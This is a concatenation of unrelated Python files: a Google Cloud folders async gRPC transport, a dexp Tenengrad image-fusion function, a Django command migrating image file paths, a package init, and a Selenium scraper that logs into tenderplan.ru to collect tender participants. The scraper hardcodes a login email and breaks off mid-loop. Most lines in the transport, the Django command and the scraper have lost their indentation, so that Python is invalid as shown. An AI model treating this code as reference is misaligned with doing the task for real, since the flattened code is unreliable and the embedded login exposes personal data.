# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1 # type: ignore
from google.api_core import grpc_helpers_async # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import packaging.version
import grpc # type: ignore
from grpc.experimental import aio # type: ignore
from google.cloud.resourcemanager_v3.types import folders
from google.iam.v1 import iam_policy_pb2 # type: ignore
from google.iam.v1 import policy_pb2 # type: ignore
from google.longrunning import operations_pb2 # type: ignore
from .base import FoldersTransport, DEFAULT_CLIENT_INFO
from .grpc import FoldersGrpcTransport
class FoldersGrpcAsyncIOTransport(FoldersTransport):
"""gRPC AsyncIO backend transport for Folders.
Manages Cloud Platform folder resources.
Folders can be used to organize the resources under an
organization and to control the policies applied to groups of
resources.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(
cls,
host: str = "cloudresourcemanager.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs,
) -> aio.Channel:
"""Create and return a gRPC AsyncIO channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
aio.Channel: A gRPC AsyncIO channel object.
"""
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs,
)
def __init__(
self,
*,
host: str = "cloudresourcemanager.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
channel: aio.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id=None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
channel (Optional[aio.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for the grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure a mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
self._operations_client = None
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
"""Create the channel designed to connect to this service.
This property caches on the instance; repeated calls return
the same channel.
"""
# Return the channel from cache.
return self._grpc_channel
@property
def operations_client(self) -> operations_v1.OperationsAsyncClient:
"""Create the client designed to process long-running operations.
This property caches on the instance; repeated calls return the same
client.
"""
# Sanity check: Only create a new client if we do not already have one.
if self._operations_client is None:
self._operations_client = operations_v1.OperationsAsyncClient(
self.grpc_channel
)
# Return the client from cache.
return self._operations_client
@property
def get_folder(
self,
) -> Callable[[folders.GetFolderRequest], Awaitable[folders.Folder]]:
r"""Return a callable for the get folder method over gRPC.
Retrieves a folder identified by the supplied resource name.
Valid folder resource names have the format
``folders/{folder_id}`` (for example, ``folders/1234``). The
caller must have ``resourcemanager.folders.get`` permission on
the identified folder.
Returns:
Callable[[~.GetFolderRequest],
Awaitable[~.Folder]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_folder" not in self._stubs:
self._stubs["get_folder"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/GetFolder",
request_serializer=folders.GetFolderRequest.serialize,
response_deserializer=folders.Folder.deserialize,
)
return self._stubs["get_folder"]
@property
def list_folders(
self,
) -> Callable[[folders.ListFoldersRequest], Awaitable[folders.ListFoldersResponse]]:
r"""Return a callable for the list folders method over gRPC.
Lists the folders that are direct descendants of supplied parent
resource. ``list()`` provides a strongly consistent view of the
folders underneath the specified parent resource. ``list()``
returns folders sorted based upon the (ascending) lexical
ordering of their display_name. The caller must have
``resourcemanager.folders.list`` permission on the identified
parent.
Returns:
Callable[[~.ListFoldersRequest],
Awaitable[~.ListFoldersResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "list_folders" not in self._stubs:
self._stubs["list_folders"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/ListFolders",
request_serializer=folders.ListFoldersRequest.serialize,
response_deserializer=folders.ListFoldersResponse.deserialize,
)
return self._stubs["list_folders"]
@property
def search_folders(
self,
) -> Callable[
[folders.SearchFoldersRequest], Awaitable[folders.SearchFoldersResponse]
]:
r"""Return a callable for the search folders method over gRPC.
Search for folders that match specific filter criteria.
``search()`` provides an eventually consistent view of the
folders a user has access to which meet the specified filter
criteria.
This will only return folders on which the caller has the
permission ``resourcemanager.folders.get``.
Returns:
Callable[[~.SearchFoldersRequest],
Awaitable[~.SearchFoldersResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "search_folders" not in self._stubs:
self._stubs["search_folders"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/SearchFolders",
request_serializer=folders.SearchFoldersRequest.serialize,
response_deserializer=folders.SearchFoldersResponse.deserialize,
)
return self._stubs["search_folders"]
@property
def create_folder(
self,
) -> Callable[[folders.CreateFolderRequest], Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the create folder method over gRPC.
Creates a folder in the resource hierarchy. Returns an
``Operation`` which can be used to track the progress of the
folder creation workflow. Upon success, the
``Operation.response`` field will be populated with the created
Folder.
In order to succeed, the addition of this new folder must not
violate the folder naming, height, or fanout constraints.
- The folder's ``display_name`` must be distinct from all other
folders that share its parent.
- The addition of the folder must not cause the active folder
hierarchy to exceed a height of 10. Note, the full active +
deleted folder hierarchy is allowed to reach a height of 20;
this provides additional headroom when moving folders that
contain deleted folders.
- The addition of the folder must not cause the total number of
folders under its parent to exceed 300.
If the operation fails due to a folder constraint violation,
some errors may be returned by the ``CreateFolder`` request,
with status code ``FAILED_PRECONDITION`` and an error
description. Other folder constraint violations will be
communicated in the ``Operation``, with the specific
``PreconditionFailure`` returned in the details list in the
``Operation.error`` field.
The caller must have ``resourcemanager.folders.create``
permission on the identified parent.
Returns:
Callable[[~.CreateFolderRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "create_folder" not in self._stubs:
self._stubs["create_folder"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/CreateFolder",
request_serializer=folders.CreateFolderRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["create_folder"]
@property
def update_folder(
self,
) -> Callable[[folders.UpdateFolderRequest], Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the update folder method over gRPC.
Updates a folder, changing its ``display_name``. Changes to the
folder ``display_name`` will be rejected if they violate either
the ``display_name`` formatting rules or the naming constraints
described in the
[CreateFolder][google.cloud.resourcemanager.v3.Folders.CreateFolder]
documentation.
The folder's ``display_name`` must start and end with a letter
or digit, may contain letters, digits, spaces, hyphens and
underscores and can be between 3 and 30 characters. This is
captured by the regular expression:
``[\p{L}\p{N}][\p{L}\p{N}_- ]{1,28}[\p{L}\p{N}]``. The caller
must have ``resourcemanager.folders.update`` permission on the
identified folder.
If the update fails due to the unique name constraint then a
``PreconditionFailure`` explaining this violation will be
returned in the Status.details field.
Returns:
Callable[[~.UpdateFolderRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "update_folder" not in self._stubs:
self._stubs["update_folder"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/UpdateFolder",
request_serializer=folders.UpdateFolderRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["update_folder"]
@property
def move_folder(
self,
) -> Callable[[folders.MoveFolderRequest], Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the move folder method over gRPC.
Moves a folder under a new resource parent. Returns an
``Operation`` which can be used to track the progress of the
folder move workflow. Upon success, the ``Operation.response``
field will be populated with the moved folder. Upon failure, a
``FolderOperationError`` categorizing the failure cause will be
returned - if the failure occurs synchronously then the
``FolderOperationError`` will be returned in the
``Status.details`` field. If it occurs asynchronously, then the
FolderOperation will be returned in the ``Operation.error``
field. In addition, the ``Operation.metadata`` field will be
populated with a ``FolderOperation`` message as an aid to
stateless clients. Folder moves will be rejected if they violate
either the naming, height, or fanout constraints described in
the
[CreateFolder][google.cloud.resourcemanager.v3.Folders.CreateFolder]
documentation. The caller must have
``resourcemanager.folders.move`` permission on the folder's
current and proposed new parent.
Returns:
Callable[[~.MoveFolderRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "move_folder" not in self._stubs:
self._stubs["move_folder"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/MoveFolder",
request_serializer=folders.MoveFolderRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["move_folder"]
@property
def delete_folder(
self,
) -> Callable[[folders.DeleteFolderRequest], Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the delete folder method over gRPC.
Requests deletion of a folder. The folder is moved into the
[DELETE_REQUESTED][google.cloud.resourcemanager.v3.Folder.State.DELETE_REQUESTED]
state immediately, and is deleted approximately 30 days later.
This method may only be called on an empty folder, where a
folder is empty if it doesn't contain any folders or projects in
the
[ACTIVE][google.cloud.resourcemanager.v3.Folder.State.ACTIVE]
state. If called on a folder in
[DELETE_REQUESTED][google.cloud.resourcemanager.v3.Folder.State.DELETE_REQUESTED]
state the operation will result in a no-op success. The caller
must have ``resourcemanager.folders.delete`` permission on the
identified folder.
Returns:
Callable[[~.DeleteFolderRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "delete_folder" not in self._stubs:
self._stubs["delete_folder"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/DeleteFolder",
request_serializer=folders.DeleteFolderRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["delete_folder"]
@property
def undelete_folder(
self,
) -> Callable[[folders.UndeleteFolderRequest], Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the undelete folder method over gRPC.
Cancels the deletion request for a folder. This method may be
called on a folder in any state. If the folder is in the
[ACTIVE][google.cloud.resourcemanager.v3.Folder.State.ACTIVE]
state the result will be a no-op success. In order to succeed,
the folder's parent must be in the
[ACTIVE][google.cloud.resourcemanager.v3.Folder.State.ACTIVE]
state. In addition, reintroducing the folder into the tree must
not violate folder naming, height, and fanout constraints
described in the
[CreateFolder][google.cloud.resourcemanager.v3.Folders.CreateFolder]
documentation. The caller must have
``resourcemanager.folders.undelete`` permission on the
identified folder.
Returns:
Callable[[~.UndeleteFolderRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "undelete_folder" not in self._stubs:
self._stubs["undelete_folder"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/UndeleteFolder",
request_serializer=folders.UndeleteFolderRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs["undelete_folder"]
@property
def get_iam_policy(
self,
) -> Callable[[iam_policy_pb2.GetIamPolicyRequest], Awaitable[policy_pb2.Policy]]:
r"""Return a callable for the get iam policy method over gRPC.
Gets the access control policy for a folder. The returned policy
may be empty if no such policy or resource exists. The
``resource`` field should be the folder's resource name, for
example: "folders/1234". The caller must have
``resourcemanager.folders.getIamPolicy`` permission on the
identified folder.
Returns:
Callable[[~.GetIamPolicyRequest],
Awaitable[~.Policy]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_iam_policy" not in self._stubs:
self._stubs["get_iam_policy"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/GetIamPolicy",
request_serializer=iam_policy_pb2.GetIamPolicyRequest.SerializeToString,
response_deserializer=policy_pb2.Policy.FromString,
)
return self._stubs["get_iam_policy"]
@property
def set_iam_policy(
self,
) -> Callable[[iam_policy_pb2.SetIamPolicyRequest], Awaitable[policy_pb2.Policy]]:
r"""Return a callable for the set iam policy method over gRPC.
Sets the access control policy on a folder, replacing any
existing policy. The ``resource`` field should be the folder's
resource name, for example: "folders/1234". The caller must have
``resourcemanager.folders.setIamPolicy`` permission on the
identified folder.
Returns:
Callable[[~.SetIamPolicyRequest],
Awaitable[~.Policy]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "set_iam_policy" not in self._stubs:
self._stubs["set_iam_policy"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/SetIamPolicy",
request_serializer=iam_policy_pb2.SetIamPolicyRequest.SerializeToString,
response_deserializer=policy_pb2.Policy.FromString,
)
return self._stubs["set_iam_policy"]
@property
def test_iam_permissions(
self,
) -> Callable[
[iam_policy_pb2.TestIamPermissionsRequest],
Awaitable[iam_policy_pb2.TestIamPermissionsResponse],
]:
r"""Return a callable for the test iam permissions method over gRPC.
Returns permissions that a caller has on the specified folder.
The ``resource`` field should be the folder's resource name, for
example: "folders/1234".
There are no permissions required for making this API call.
Returns:
Callable[[~.TestIamPermissionsRequest],
Awaitable[~.TestIamPermissionsResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "test_iam_permissions" not in self._stubs:
self._stubs["test_iam_permissions"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/TestIamPermissions",
request_serializer=iam_policy_pb2.TestIamPermissionsRequest.SerializeToString,
response_deserializer=iam_policy_pb2.TestIamPermissionsResponse.FromString,
)
return self._stubs["test_iam_permissions"]
def close(self):
return self.grpc_channel.close()
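# Minimal usage sketch, assuming a transport instance already constructed over
# a live channel with valid credentials (normally the higher-level async client
# builds it for you); "folders/1234" is a placeholder resource name.
async def _example_get_folder(transport: "FoldersGrpcAsyncIOTransport") -> None:
    request = folders.GetFolderRequest(name="folders/1234")
    folder = await transport.get_folder(request)  # unary-unary RPC, awaited
    print(folder.display_name)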
__all__ = ("FoldersGrpcAsyncIOTransport",)
|
from typing import Optional
from dexp.processing.filters.sobel_filter import sobel_filter
from dexp.processing.utils.blend_images import blend_images
from dexp.processing.utils.element_wise_affine import element_wise_affine
from dexp.processing.utils.fit_shape import fit_to_shape
from dexp.utils import xpArray
from dexp.utils.backends import Backend, NumpyBackend
def fuse_tg_nd(
image_a: xpArray,
image_b: xpArray,
downscale: Optional[int] = 2,
sharpness: Optional[float] = 24,
tenengrad_smoothing: Optional[int] = 4,
blend_map_smoothing: Optional[int] = 10,
bias_axis: Optional[int] = None,
bias_exponent: Optional[float] = 3,
bias_strength: Optional[float] = 2,
clip: Optional[bool] = True,
internal_dtype=None,
_display_blend_map: bool = False,
):
"""
Fuses two images by picking regions from one or the other image based on the local image quality
measured by using the magnitude of the Sobel gradient -- similarly as in the Tenengrad focus metric.
A smooth blend map is computed that blends the two images based on local image quality. A bias can be
introduced to favor one side of an axis versus another.
Parameters
----------
image_a : First image to fuse
image_b : Second image to fuse
downscale : How much to downscale the two images in order to compute the blend map.
A value of 2 is good to achieve both coarse denoising and reduce compute load.
    sharpness : How 'sharp' the choice between the two images should be.
        A large value ensures that, most of the time, the voxel values of one or the other image
        are picked with very little mixing, even when the local image quality of the two images is similar.
tenengrad_smoothing : How much to smooth the tenengrad map
blend_map_smoothing : How much to smooth the blend map
bias_axis : Along which axis should a bias be introduced in the blend map. None for no bias.
bias_exponent : Exponent for the bias
bias_strength : Bias strength -- zero means no bias
clip : clip output to input images min and max values.
internal_dtype : dtype for internal computation
_display_blend_map : For debugging purposes, we can display the images to fuse, the blend map and result.
    Returns
    -------
    Fused image.
    """
xp = Backend.get_xp_module()
sp = Backend.get_sp_module()
if not image_a.shape == image_b.shape:
raise ValueError("Arrays must have the same shape")
if not image_a.dtype == image_b.dtype:
raise ValueError("Arrays must have the same dtype")
if internal_dtype is None:
internal_dtype = image_a.dtype
if type(Backend.current()) is NumpyBackend:
internal_dtype = xp.float32
original_dtype = image_a.dtype
image_a = Backend.to_backend(image_a, dtype=internal_dtype)
image_b = Backend.to_backend(image_b, dtype=internal_dtype)
min_a, max_a = xp.min(image_a), xp.max(image_a)
min_b, max_b = xp.min(image_b), xp.max(image_b)
min_value = min(min_a, min_b)
    max_value = max(max_a, max_b)
del min_a, max_a, min_b, max_b
# downscale to speed up computation and reduce noise
    d_image_a = sp.ndimage.zoom(image_a, zoom=1 / downscale, order=0)
    d_image_b = sp.ndimage.zoom(image_b, zoom=1 / downscale, order=0)
# Denoise further:
d_image_a = sp.ndimage.gaussian_filter(d_image_a, sigma=1.5)
d_image_b = sp.ndimage.gaussian_filter(d_image_b, sigma=1.5)
# Compute Tenengrad filter:
t_image_a = sobel_filter(d_image_a, exponent=1, normalise_input=False, in_place_normalisation=True)
t_image_b = sobel_filter(d_image_b, exponent=1, normalise_input=False, in_place_normalisation=True)
del d_image_a, d_image_b
# Apply maximum filter:
t_image_a = sp.ndimage.maximum_filter(t_image_a, size=tenengrad_smoothing)
t_image_b = sp.ndimage.maximum_filter(t_image_b, size=tenengrad_smoothing)
# Apply smoothing filter:
t_image_a = sp.ndimage.uniform_filter(t_image_a, size=max(1, tenengrad_smoothing))
t_image_b = sp.ndimage.uniform_filter(t_image_b, size=max(1, tenengrad_smoothing))
# Normalise:
t_min_value = min(xp.min(t_image_a), xp.min(t_image_b))
t_max_value = max(xp.max(t_image_a), xp.max(t_image_b))
alpha = (1 / (t_max_value - t_min_value)).astype(internal_dtype)
beta = (-t_min_value / (t_max_value - t_min_value)).astype(internal_dtype)
t_image_a = element_wise_affine(t_image_a, alpha, beta, out=t_image_a)
t_image_b = element_wise_affine(t_image_b, alpha, beta, out=t_image_b)
del t_min_value, t_max_value
# Add bias:
if bias_axis is not None and bias_strength != 0:
length = t_image_a.shape[bias_axis]
bias_vector = xp.linspace(-1, 1, num=length)
bias_vector = xp.sign(bias_vector) * (xp.absolute(bias_vector) ** bias_exponent)
new_shape = tuple(s if i == bias_axis else 1 for i, s in enumerate(t_image_a.shape))
bias_vector = xp.reshape(bias_vector, newshape=new_shape)
t_image_a -= bias_strength * bias_vector
t_image_b += bias_strength * bias_vector
del bias_vector
# compute the absolute difference and sign:
diff = t_image_a
diff -= t_image_b
del t_image_b
sgn_diff = xp.sign(diff)
abs_diff = xp.absolute(diff, out=diff)
abs_diff **= 1 / sharpness
del diff
# compute blending map:
blend_map = abs_diff
blend_map *= sgn_diff
blend_map = element_wise_affine(blend_map, 0.5, 0.5, out=blend_map)
del sgn_diff
# Upscale blending map back to original size:
blend_map = sp.ndimage.zoom(blend_map, zoom=downscale, order=1)
# Padding to recover original image size:
blend_map = fit_to_shape(blend_map, shape=image_a.shape)
# Smooth blend map to have less seams:
    blend_map = sp.ndimage.uniform_filter(blend_map, size=blend_map_smoothing)
# Fuse using blending map:
image_fused = blend_images(image_a, image_b, blend_map)
if not _display_blend_map:
del image_a, image_b, blend_map
if clip:
image_fused = xp.clip(image_fused, min_value, max_value, out=image_fused)
# Adjust type:
image_fused = image_fused.astype(original_dtype, copy=False)
if _display_blend_map:
from napari import Viewer, gui_qt
with gui_qt():
def _c(array):
return Backend.to_numpy(array)
viewer = Viewer()
viewer.add_image(_c(image_a), name="image_a", contrast_limits=(0, 600))
viewer.add_image(_c(image_b), name="image_b", contrast_limits=(0, 600))
viewer.add_image(_c(blend_map), name="blend_map")
viewer.add_image(_c(image_fused), name="image_fused", contrast_limits=(0, 600))
return image_fused
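# Minimal usage sketch, assuming NumpyBackend can be used as a context manager
# that sets the current backend (the usual dexp pattern); the random volumes
# are placeholders for two registered views of the same sample.
def _example_fuse():
    import numpy as np

    with NumpyBackend():
        view_a = np.random.rand(64, 64, 64).astype(np.float32)
        view_b = np.random.rand(64, 64, 64).astype(np.float32)
        fused = fuse_tg_nd(view_a, view_b, bias_axis=0, bias_strength=1)
        return fused.shape, fused.dtype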
|
from pathlib import Path
from django.core.management import BaseCommand
from django.core.paginator import Paginator
from grandchallenge.cases.models import Image, ImageFile, image_file_path
class Command(BaseCommand):
def handle(self, *args, **options):
images = (
Image.objects.all().order_by("created").prefetch_related("files")
)
paginator = Paginator(images, 100)
print(f"Found {paginator.count} images")
for idx in paginator.page_range:
print(f"Page {idx} of {paginator.num_pages}")
page = paginator.page(idx)
for im in page.object_list:
for f in im.files.exclude(image_type=ImageFile.IMAGE_TYPE_DZI):
old_name = f.file.name
new_name = image_file_path(f, Path(f.file.name).name)
if old_name == new_name:
print(f"Skipping {old_name}")
else:
print(f"Migrating {old_name} to {new_name}")
storage = f.file.storage
storage.copy(from_name=old_name, to_name=new_name)
f.file.name = new_name
f.save()
storage.delete(old_name)
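# Usage sketch (shell): Django management commands run through manage.py; the
# command name equals this module's filename, assumed here to be
# migrate_image_files.
#   python manage.py migrate_image_files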
|
from .pyk4a import *
from .pyk4abt import *
|
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.common.exceptions import TimeoutException
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import StaleElementReferenceException
from time import sleep
from selenium import webdriver
from Main.Tenderplan.password import get_passwd
def waiter(expression, method='xpath', delay=7, click=0, event='presence'):
try:
if method == 'xpath':
if event == 'presence':
WebDriverWait(driver, delay).until(EC.presence_of_element_located((By.XPATH, expression)))
elif event == 'visibility':
WebDriverWait(driver, delay).until(EC.visibility_of_element_located((By.XPATH, expression)))
elif method == 'css':
if event == 'presence':
WebDriverWait(driver, delay).until(EC.presence_of_element_located((By.CSS_SELECTOR, expression)))
            elif event == 'visibility':
WebDriverWait(driver, delay).until(EC.visibility_of_element_located((By.CSS_SELECTOR, expression)))
if click == 1:
driver.find_element_by_xpath(expression).click()
return True
except TimeoutException:
# print("Loading took too much time!")
return False
def get_participants():
global driver
    # request the password for tenderplan.ru
pwd = get_passwd().strip()
driver = webdriver.Firefox()
driver.get("http://tenderplan.ru/account/logon")
username = driver.find_element_by_name("EmailAddress")
password = driver.find_element_by_name("Password")
username.send_keys("zheleznov@innoter.com")
password.send_keys(pwd)
driver.find_element_by_xpath("/html/body/div[1]/div/div[1]/section/div/div/form/div[3]/button").click()
    # Click the "Лиды отработать" ("Leads to process") tab
    print('Requesting the list of leads...')
    sleep(2)
    waiter("//*[contains(text(), 'Лиды отработать')]", click=1)
    # wait for the leads to finish loading
    sleep(3)
    # TODO: collect all participants into a set and remove duplicates
    # TODO: identify the winner
    # TODO: add a link to the tender (taken from the address bar)
    # TODO: export to Excel
counter = 0
seen_companies = set()
participants_list = []
while True:
counter += 1
try:
            # Iterate over the list of leads, waiting (visibility) for new ones to load
            waiter(
                "//*[@id='slidepanel-left-wrapper']/div/div/div/div[2]/div[" + str(counter) + "]",
                click=1, event='visibility')
            # Tender name
            tender_name = driver.find_element_by_xpath(
                "//*[@id='slidepanel-left-wrapper']/div/div/div/div[2]/div[" + str(counter) + "]/div/div[2]/div[1]").text
            print('\nLead {}: {}'.format(counter, tender_name))
        except NoSuchElementException:
            print('End of the leads list')
break
try:
if waiter('.col-sm-12.notification-title.notification-header-mark', 'css', event='visibility') is True:
                # The tender page has fully loaded; we can look for the participants table
                table_presence_tag = waiter('table.participants-table', method='css', delay=0)
                if table_presence_tag is True:
                    # the participants table is present, process it
                    # waiter('table.participants-table', method='css')
                    table = driver.find_element_by_css_selector(
                        '.table.table-striped.table-condensed.participants-table>tbody')
                    print('\n')
                    participants = table.find_elements_by_css_selector('.deflink-button>span')
                    winner_flag = False
                    for x in range(len(participants)):
                        if len(participants[x].text) > 0:
                            # print('=' * 2000)
                            company = participants[x].text.strip()
                            print(company)
                            if x + 1 != len(participants) and participants[x + 1].size == {'height': 16, 'width': 16}:
                                winner_flag = True
                                print('Winner!')
                            else:
                                winner_flag = False
                            # if x < len(participants):
                            #     print('Curr x: {}, length: {}, x+1: {}'.format(x, len(participants), x + 1))
                            #     # size of the trophy icon (always the list element right after the company name)
                            #     if participants[x + 1].size == {'height': 16, 'width': 16}:
                            #         print('Winner!')
if company not in seen_companies:
seen_companies.add(company)
if winner_flag is True:
participant_dict = {'company': company, 'tender_name': [{tender_name: 'win'}]}
elif winner_flag is False:
participant_dict = {'company': company, 'tender_name': [{tender_name: 'par'}]}
participants_list.append(participant_dict)
del participant_dict
else:
for item in participants_list:
if item['company'] == company:
if winner_flag is True:
item['tender_name'].append({tender_name: 'win'})
